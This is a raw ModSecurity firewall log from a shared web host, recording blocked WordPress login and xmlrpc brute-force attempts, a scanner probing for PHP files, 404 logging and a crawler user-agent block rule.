[Tue May 26 15:54:31.062824 2026] [security2:error] [pid 747840:tid 748014] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV03om6MwAuYuZKxvkDRgAAATY"]
[Tue May 26 15:54:31.296835 2026] [security2:error] [pid 745492:tid 745654] [client 106.219.85.83:17755] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV034mEQglTmoWcfxKJ_gAAAKI"]
[Tue May 26 15:54:31.296919 2026] [security2:error] [pid 745492:tid 745654] [client 106.219.85.83:17755] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV034mEQglTmoWcfxKJ_gAAAKI"]
[Tue May 26 15:54:31.780829 2026] [security2:error] [pid 745492:tid 745674] [client 62.244.225.226:44957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahV034mEQglTmoWcfxKJ_wAAALY"]
[Tue May 26 15:54:31.997190 2026] [security2:error] [pid 747840:tid 748006] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV034m6MwAuYuZKxvkDVwAAAS4"]
[Tue May 26 15:54:34.701338 2026] [security2:error] [pid 747840:tid 747988] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV04om6MwAuYuZKxvkDdwAAARw"]
[Tue May 26 15:54:34.730276 2026] [security2:error] [pid 747840:tid 747967] [remote 195.250.23.247:55890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahV04om6MwAuYuZKxvkDfwABb34"]
[Tue May 26 15:54:35.667848 2026] [security2:error] [pid 747840:tid 748088] [client 103.153.130.62:59260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV044m6MwAuYuZKxvkDjQAAAYA"]
[Tue May 26 15:54:35.667974 2026] [security2:error] [pid 747840:tid 748088] [client 103.153.130.62:59260] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV044m6MwAuYuZKxvkDjQAAAYA"]
[Tue May 26 15:54:36.069532 2026] [security2:error] [pid 745492:tid 745654] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV044mEQglTmoWcfxKKSwAAAKI"]
[Tue May 26 15:54:36.492137 2026] [security2:error] [pid 745492:tid 745668] [client 103.44.52.196:35718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV05ImEQglTmoWcfxKKXwAAALA"]
[Tue May 26 15:54:36.492289 2026] [security2:error] [pid 745492:tid 745668] [client 103.44.52.196:35718] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV05ImEQglTmoWcfxKKXwAAALA"]
[Tue May 26 15:54:37.653515 2026] [security2:error] [pid 747840:tid 748069] [client 143.110.243.118:42086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/w.php"] [unique_id "ahV05Ym6MwAuYuZKxvkDtAAAAW0"]
[Tue May 26 15:54:38.115285 2026] [security2:error] [pid 747840:tid 748007] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV05Ym6MwAuYuZKxvkDtgAAAS8"]
[Tue May 26 15:54:40.638217 2026] [security2:error] [pid 745492:tid 745656] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV06ImEQglTmoWcfxKKiAAAAKQ"]
[Tue May 26 15:54:41.737307 2026] [security2:error] [pid 745492:tid 745707] [client 223.123.35.44:36260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV06YmEQglTmoWcfxKKmgAAANc"]
[Tue May 26 15:54:41.737467 2026] [security2:error] [pid 745492:tid 745707] [client 223.123.35.44:36260] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV06YmEQglTmoWcfxKKmgAAANc"]
[Tue May 26 15:54:41.925771 2026] [security2:error] [pid 747840:tid 748080] [client 106.219.85.83:6962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV06Ym6MwAuYuZKxvkD-QAAAXg"]
[Tue May 26 15:54:41.925912 2026] [security2:error] [pid 747840:tid 748080] [client 106.219.85.83:6962] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV06Ym6MwAuYuZKxvkD-QAAAXg"]
[Tue May 26 15:54:42.105422 2026] [security2:error] [pid 747840:tid 748045] [client 62.60.130.233:64516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV06Ym6MwAuYuZKxvkD_QAAAVU"], referer: https://www.bing.com/
[Tue May 26 15:54:42.448004 2026] [security2:error] [pid 747840:tid 748091] [client 62.60.130.233:62507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.amdsi.org.in"] [uri "/wp-login.php"] [unique_id "ahV06om6MwAuYuZKxvkEBgAAAYM"], referer: https://wordpress.org/
[Tue May 26 15:54:42.909960 2026] [security2:error] [pid 745492:tid 745697] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV06omEQglTmoWcfxKKogAAAM0"]
[Tue May 26 15:54:44.815744 2026] [security2:error] [pid 747840:tid 747988] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV07Im6MwAuYuZKxvkEOgAAARw"]
[Tue May 26 15:54:46.102107 2026] [security2:error] [pid 747840:tid 748070] [client 103.153.130.62:59536] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV07om6MwAuYuZKxvkEVwAAAW4"]
[Tue May 26 15:54:46.102218 2026] [security2:error] [pid 747840:tid 748070] [client 103.153.130.62:59536] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV07om6MwAuYuZKxvkEVwAAAW4"]
[Tue May 26 15:54:46.550967 2026] [security2:error] [pid 745492:tid 745659] [client 143.110.243.118:48828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-db.php"] [unique_id "ahV07omEQglTmoWcfxKK2AAAAKc"]
[Tue May 26 15:54:46.799976 2026] [security2:error] [pid 747840:tid 748036] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV07om6MwAuYuZKxvkEXAAAAUw"]
[Tue May 26 15:54:46.960546 2026] [security2:error] [pid 745492:tid 745728] [client 103.44.52.196:57584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV07omEQglTmoWcfxKK3QAAAOw"]
[Tue May 26 15:54:46.960707 2026] [security2:error] [pid 745492:tid 745728] [client 103.44.52.196:57584] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV07omEQglTmoWcfxKK3QAAAOw"]
[Tue May 26 15:54:47.342457 2026] [security2:error] [pid 745492:tid 745689] [client 167.71.246.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.lifestylemne.me"] [uri "/index.php"] [unique_id "ahV074mEQglTmoWcfxKK6QAAAMU"]
[Tue May 26 15:54:48.745264 2026] [security2:error] [pid 747840:tid 747987] [client 143.110.243.118:48844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-includes/lx.php"] [unique_id "ahV08Im6MwAuYuZKxvkEdQAAARs"]
[Tue May 26 15:54:48.764966 2026] [security2:error] [pid 745492:tid 745533] [remote 103.50.205.131:45584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.205.50.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahV08ImEQglTmoWcfxKLCgABAiU"]
[Tue May 26 15:54:48.932154 2026] [security2:error] [pid 747840:tid 748007] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV08Im6MwAuYuZKxvkEcQAAAS8"]
[Tue May 26 15:54:50.865362 2026] [security2:error] [pid 747840:tid 747980] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV08om6MwAuYuZKxvkEmgAAARQ"]
[Tue May 26 15:54:51.697738 2026] [security2:error] [pid 745492:tid 745744] [client 216.244.66.241:35162] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV084mEQglTmoWcfxKLKQAAAPw"]
[Tue May 26 15:54:51.697870 2026] [security2:error] [pid 745492:tid 745744] [client 216.244.66.241:35162] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV084mEQglTmoWcfxKLKQAAAPw"]
[Tue May 26 15:54:51.783515 2026] [security2:error] [pid 747840:tid 748007] [client 143.110.243.118:48856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/ice.php"] [unique_id "ahV084m6MwAuYuZKxvkEsAAAAS8"]
[Tue May 26 15:54:51.895688 2026] [security2:error] [pid 747840:tid 747988] [client 216.244.66.241:35166] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV084m6MwAuYuZKxvkEtAAAARw"]
[Tue May 26 15:54:51.895809 2026] [security2:error] [pid 747840:tid 747988] [client 216.244.66.241:35166] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahV084m6MwAuYuZKxvkEtAAAARw"]
[Tue May 26 15:54:52.831242 2026] [security2:error] [pid 747840:tid 748094] [client 106.219.85.83:1634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV09Im6MwAuYuZKxvkEwQAAAYY"]
[Tue May 26 15:54:52.831441 2026] [security2:error] [pid 747840:tid 748094] [client 106.219.85.83:1634] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV09Im6MwAuYuZKxvkEwQAAAYY"]
[Tue May 26 15:54:53.241909 2026] [security2:error] [pid 747840:tid 748059] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV09Im6MwAuYuZKxvkEwwAAAWM"]
[Tue May 26 15:54:53.419964 2026] [security2:error] [pid 747840:tid 748022] [client 14.183.116.244:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV09Im6MwAuYuZKxvkEyAAAAT4"]
[Tue May 26 15:54:54.232231 2026] [security2:error] [pid 747840:tid 748039] [client 223.123.35.44:36261] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV09om6MwAuYuZKxvkE3QAAAU8"]
[Tue May 26 15:54:54.232412 2026] [security2:error] [pid 747840:tid 748039] [client 223.123.35.44:36261] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahV09om6MwAuYuZKxvkE3QAAAU8"]
[Tue May 26 15:54:55.007796 2026] [security2:error] [pid 747840:tid 747977] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV09om6MwAuYuZKxvkE4wAAARE"]
[Tue May 26 15:54:56.730681 2026] [security2:error] [pid 745492:tid 745706] [client 103.153.130.55:59821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0-ImEQglTmoWcfxKLYgAAANY"]
[Tue May 26 15:54:56.730869 2026] [security2:error] [pid 745492:tid 745706] [client 103.153.130.55:59821] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahV0-ImEQglTmoWcfxKLYgAAANY"]
[Tue May 26 15:54:57.009958 2026] [security2:error] [pid 747840:tid 748050] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0-Im6MwAuYuZKxvkE_QAAAVo"]
[Tue May 26 15:54:57.593918 2026] [security2:error] [pid 747840:tid 748058] [client 103.44.52.196:46890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0-Ym6MwAuYuZKxvkFCgAAAWI"]
[Tue May 26 15:54:57.594090 2026] [security2:error] [pid 747840:tid 748058] [client 103.44.52.196:46890] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV0-Ym6MwAuYuZKxvkFCgAAAWI"]
[Tue May 26 15:54:57.859141 2026] [security2:error] [pid 747840:tid 747997] [client 114.119.150.249:37059] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/wp-content/uploads/2017/04/house-demo2-41-835x467.jpg"] [unique_id "ahV0-Ym6MwAuYuZKxvkFFQAAASU"], referer: https://rainadelproperties.com/wp-content/uploads/2017/04/house-demo2-41-835x467.jpg
[Tue May 26 15:54:58.762648 2026] [security2:error] [pid 745492:tid 745684] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0-omEQglTmoWcfxKLgwAAAMA"]
[Tue May 26 15:54:59.786219 2026] [security2:error] [pid 745492:tid 745565] [remote 51.38.192.10:54178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.192.38.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahV0-4mEQglTmoWcfxKLkAABAUU"]
[Tue May 26 15:55:00.796796 2026] [security2:error] [pid 745492:tid 745726] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0_ImEQglTmoWcfxKLpAAAAOo"]
[Tue May 26 15:55:01.708363 2026] [security2:error] [pid 745492:tid 745702] [client 66.249.64.169:41279] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV0_ImEQglTmoWcfxKLqgAAANI"], referer: https://doyecpa.com/prizes/178396571%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 15:55:03.116752 2026] [security2:error] [pid 745492:tid 745659] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV0_omEQglTmoWcfxKL1QAAAKc"]
[Tue May 26 15:55:03.362395 2026] [security2:error] [pid 745492:tid 745729] [client 106.219.85.83:21476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0_4mEQglTmoWcfxKL3gAAAO0"]
[Tue May 26 15:55:03.362576 2026] [security2:error] [pid 745492:tid 745729] [client 106.219.85.83:21476] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV0_4mEQglTmoWcfxKL3gAAAO0"]
[Tue May 26 15:55:04.480034 2026] [security2:error] [pid 747840:tid 748085] [client 66.249.64.160:35504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahV0_4m6MwAuYuZKxvkFSgAAAX0"], referer: https://doyecpa.com/prizes/178396571%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 15:55:04.680269 2026] [security2:error] [pid 745492:tid 745690] [client 143.110.243.118:60054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-content/lx.php"] [unique_id "ahV1AImEQglTmoWcfxKL7wAAAMY"]
[Tue May 26 15:55:05.298768 2026] [security2:error] [pid 747840:tid 747993] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV1AIm6MwAuYuZKxvkFYgAAASE"]
[Tue May 26 15:55:05.454198 2026] [security2:error] [pid 745492:tid 745585] [remote 65.2.90.30:32788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.90.2.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahV1AYmEQglTmoWcfxKL-gAA5lk"]
